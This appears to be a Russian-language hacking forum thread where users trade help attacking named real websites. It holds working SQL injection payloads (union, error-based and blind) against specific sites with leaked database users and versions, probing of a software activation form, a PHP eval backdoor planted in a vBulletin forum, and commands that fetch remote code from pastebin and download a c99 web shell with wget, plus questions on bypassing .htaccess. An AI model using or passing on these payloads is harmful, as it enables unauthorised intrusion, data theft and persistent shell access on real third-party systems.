Это можно сделать _http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'
Здравствуйте, подскажите как можно раскрутить такие скули: http://www.timesworld24.com/cat-news-details.php?id=%20'+union(sElect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17)+--+ //без валидного id отдает ошибку sql http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает http://www.daviddeltredici.com/worksbycat.php%3Fid=-6+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+ //404 отдает, не mysql? Заарнее благодарен
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74%27+or%201%20group%20by%20concat%28user%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201+--+ Duplicate entry 'asanbiotech_e@localhost1' for key 1
http://www.timesworld24.com/cat-news-details.php?id=1 Инъекция в числовом параметре Определим количество столбцов (смотрим низ страницы) http://www.timesworld24.com/cat-news-details.php?id=1+group+by+7+--+#.UR8NhG-rEhH TRUE http://www.timesworld24.com/cat-news-details.php?id=1+group+by+8+--+#.UR8NhG-rEhH FALSE Обходим WAF http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,2,3,4,5,6,7)+--+ Добиваемся вывода http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7)+--+#.UR8NQW-rEhH 5.5.23-55:timeswor_n2031t2@localhost http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1='1 Инъекция в строковом параметре http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+25+--+ TRUE http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+26+--+ FALSE http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,'25#+--+ Данные передаются в UPDATE запрос, а значит финт ушами не прокатит. Остаётся BLIND http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=if(substring((@@version),1,1)=4,1,2)+--+ Ну или более привычный вам http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+substring((@@version),1,1)=4+--+ Есть возможность крутить как Error-Based, но её уже предложили выше. http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27 Инъекция в числовом параметре Добиваемся вывода http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27+and+1=2+union+select+1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Вобщем суть такая. Есть форма активации одной софтинки. Софтинка при установке привязывается к железу. В форму вводишь ключ который получился от привязки (по типу 45F7EF0456A88B0536633746C986 ) И ключ оплаты который получил на сайте, после оплаты. Вот собственно форма Активации: _http://worldbik.ru/act.php В ней два поля. Ковычки и т.п. Фильтруется, однако если в верхнее поле (код оплаты) ввести русские буквы ( в нижнее поле нужно ввести что угодно, чтобы не было пустым.) то вылазит ошибка Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/muwik/worldbik.ru/act.php on line 76 Можно ли как нибудь этим воспользоваться, или кроме раскрытия путей это ничего не даст?
Подскажите, можно отсюда что-нибудь вытащить? Или в каком направлении двигаться? http://site.ru/index.php?area=viewSale&id=31 class: PostgresDatabaseException code: 42P01 message: ERROR: 42P01: relation "sale" does not exist - SELECT "sale"."id", "sale"."category_id", "sale"."title", "sale"."created", "sale"."announce", "sale"."content", "sale"."project_id" FROM "sale" WHERE ("sale"."id" = '31') #0 /var/www/onphp-framework/core/DB/DB.class.php(321): PgSQL->queryRaw('SELECT "sale"."...') #1 /var/www/onphp-framework/core/DB/PgSQL.class.php(126): DB->query(Object(SelectQuery)) #2 /var/www/onphp-framework/main/DAOs/Workers/BaseDaoWorker.class.php(152): PgSQL->queryRow(Object(SelectQuery)) #3 /var/www/onphp-framework/main/DAOs/Workers/CommonDaoWorker.class.php(53): BaseDaoWorker->cachedFetchObject(Object(SelectQuery), 604800, true) #4 /var/www/onphp-framework/main/DAOs/Workers/TransparentDaoWorker.class.php(29): CommonDaoWorker->getById(31, 604800) #5 /var/www/onphp-framework/main/DAOs/GenericDAO.class.php(165): TransparentDaoWorker->getById(31, 3600) #6 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(144): GenericDAO->getById(31) #7 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(118): PrimitiveIdentifier->actualImportValue(31) #8 /var/www/onphp-framework/core/Form/Form.class.php(422): PrimitiveIdentifier->import(Array) #9 /var/www/onphp-framework/core/Form/Form.class.php(299): Form->importPrimitive(Array, Object(PrimitiveIntegerIdentifier)) #10 /var/www/site.ru/friends/newAwards-msk/user/controllers/viewNews.class.php(22): Form->import(Array) #11 /var/www/site.ru/library/classes/Flow/PosterSessionFilter.class.php(66): viewNews->handleRequest(Object(HttpRequest)) #12 /var/www/site.ru/friends/newAwards-msk/classes/Flow/ProjectFilter.class.php(29): PosterSessionFilter->handleRequest(Object(HttpRequest)) #13 /var/www/site.ru/friends/newAwards-msk/user/htdocs/index.php(56): ProjectFilter->handleRequest(Object(HttpRequest)) #14 {main} при запросе ?area=viewSale&id=31'+or+"sale"."id" = '31 или ?area=viewSale&id=31'+or+id = '31 отправляет на главную страницу
Code: http://bilet.aero/news/event?id=4)or(1)group+by(mid(version(),rand(0)|0))having(avg(0))and(1)--+- Duplicate entry '5.0.51a-24+lenny2'
Трям. Как можно с помощью js скрипта подгрузить шелл ? тобишь я могу в корень сайта влепить код типа: </script> <script type="text/javascript" src="http//www.site1.ru/.js"> </script> пхп коды не обрабатываются
Всем привет, пытаюсь залится на vb 4.1.2. Добавил в faq_complete if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e'])); Phpinfo(); выводится. Пробую вот так: Code: faq.php?e=eval(file_get_contents('http://pastebin.com/raw.php?i=S7hg2xCy')); И ничего. Что я не так делаю?
Возник другой вопрос. Code: system("wget -O customavatars/sss.php http://c99.gen.tr/c99.txt"); Делаю вот так, папка кастом аватарс доступна под запись. Сайт бесконечно грузит этот запрос. Отображаю файлы из каталога: Code: system("cd customavatars;ls -al"); Файл создается, но создается он странно: Code: -rw-r--r-- 1 apache apache 0 Feb 22 12:06 sss.php и при попытке чтения вылетает Internal Server Error Опять таки, что я делаю не так?
Правильно будет faq.php?e=eval(file_get_contents('http://www.tut_shell_code.txt)); При этом у шелла надо убрать вначале <?php и в конце ?> Очевидно, что отсутсвуют права на выполнение скрипта. Ещё может быть защита посредством .htaccess
Я убирал <?php ?>, лил на другой хост(где прямой линк был, с .txt), но была опять бесконечная загрузка. Скорее и вправду, .htaccess мешает(он есть в корне форума), мб подскажешь, как можно обойти эту фигню?
